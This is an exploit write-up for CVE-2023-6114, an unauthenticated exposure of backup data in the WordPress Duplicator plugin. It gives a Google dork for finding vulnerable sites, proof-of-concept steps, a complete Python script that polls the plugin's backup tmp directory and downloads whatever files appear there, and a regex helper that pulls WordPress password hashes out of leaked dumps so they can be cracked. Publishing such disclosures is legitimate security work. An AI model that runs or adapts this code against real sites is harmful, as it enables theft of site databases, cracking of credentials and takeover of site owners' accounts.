WordPress Duplicator Data Exposure / Account Takeover
WordPress Duplicator plugin versions prior to 1.5.7.1 suffer from an unauthenticated sensitive data exposure vulnerability that can lead to account takeover.
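The exposure hinges on the web server returning an auto-generated directory index for the plugin's tmp path. The anchor-filtering the exploit performs on such a listing can be sketched with only the Python standard library (no BeautifulSoup); the class and function names below are illustrative, not part of the original exploit:

```python
from html.parser import HTMLParser


class IndexLinkParser(HTMLParser):
    """Collect href targets from a directory-index page."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def listed_files(index_html):
    """Return file names from an index listing, ignoring the
    parent-directory link and Apache column-sort links (?C=N;O=D)."""
    parser = IndexLinkParser()
    parser.feed(index_html)
    return [h for h in parser.hrefs if h != "../" and not h.startswith("?")]
```

Feeding this an Apache-style "Index of" page yields only the backup artifacts, which is exactly the set of names the full exploit goes on to fetch.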
# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover
# Google Dork: inurl:("plugins/duplicator/")
# Date: 2023-12-04
# Exploit Author: Dmitrii Ignatyev
# Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: < 1.5.7.1
# Tested on: WordPress 6.4
# CVE: CVE-2023-6114
# CVE-Link: https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/
# CVE-Link: https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/

A severe vulnerability has been discovered in the directory
*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only
exposes extensive information about the site, including its
configuration, directories, and files, but, more critically, grants
unauthorized access to sensitive data in the database, including every
record it contains. Exploiting this vulnerability poses an imminent
threat: an attacker can *brute-force the exposed password hashes and,
subsequently, compromise the entire system*.

*POC*:

1) Either the administrator must trigger a backup, or an auto-backup
   must run at its scheduled time.
2) The exploit sends a file-listing request every 5 seconds.
3) The attacker runs the exploit against the vulnerable site.

The exploit sends a request to the server every 5 seconds for the path
*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/*, and if
it finds anything in the directory index, it instantly parses all the
data and prints it to the screen.

Exploit (python3):

import re
import time

import requests
from bs4 import BeautifulSoup

url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"
processed_files = set()


def get_file_names(url):
    """Return the file names listed in the directory index, if any."""
    response = requests.get(url)
    if response.status_code == 200 and len(response.text) > 0:
        soup = BeautifulSoup(response.text, 'html.parser')
        links = soup.find_all('a')
        file_names = []
        for link in links:
            file_name = link.get('href')
            # Skip the parent-directory link and column-sort query links.
            if file_name != "../" and not file_name.startswith("?"):
                file_names.append(file_name)
        return file_names
    return []


def get_file_content(url, file_name):
    """Download a listed file, skipping .zip archives."""
    file_url = url + file_name
    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
        print(f"Ignoring file: {file_name}")
        return None
    file_response = requests.get(file_url)
    if file_response.status_code == 200:
        return file_response.text
    return None


while True:
    file_names = get_file_names(url)
    if file_names:
        print("File names on the page:")
        for file_name in file_names:
            if file_name not in processed_files:
                print(file_name)
                file_content = get_file_content(url, file_name)
                if file_content is not None:
                    print("File content:")
                    print(file_content)
                    processed_files.add(file_name)
    time.sleep(5)

--
With best regards,
Dmitrii Ignatyev, Penetration Tester
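The account-takeover step relies on the leaked database dump containing WordPress user_pass hashes, which are phpass "portable" strings beginning with $P$. A minimal, hypothetical sketch of pulling candidate hashes out of a captured dump for offline cracking; the regex and helper name are assumptions, not part of the original exploit:

```python
import re

# phpass portable hashes used by WordPress: "$P$" followed by one
# iteration-count character, an 8-character salt, and a 22-character
# hash, all drawn from the alphabet [./0-9A-Za-z].
PHPASS_RE = re.compile(r"\$P\$[./0-9A-Za-z]{31}")


def extract_hashes(sql_dump):
    """Return the unique phpass-style password hashes found in a dump."""
    return sorted(set(PHPASS_RE.findall(sql_dump)))
```

The extracted strings can then be handed to a password cracker for the brute-force stage described above.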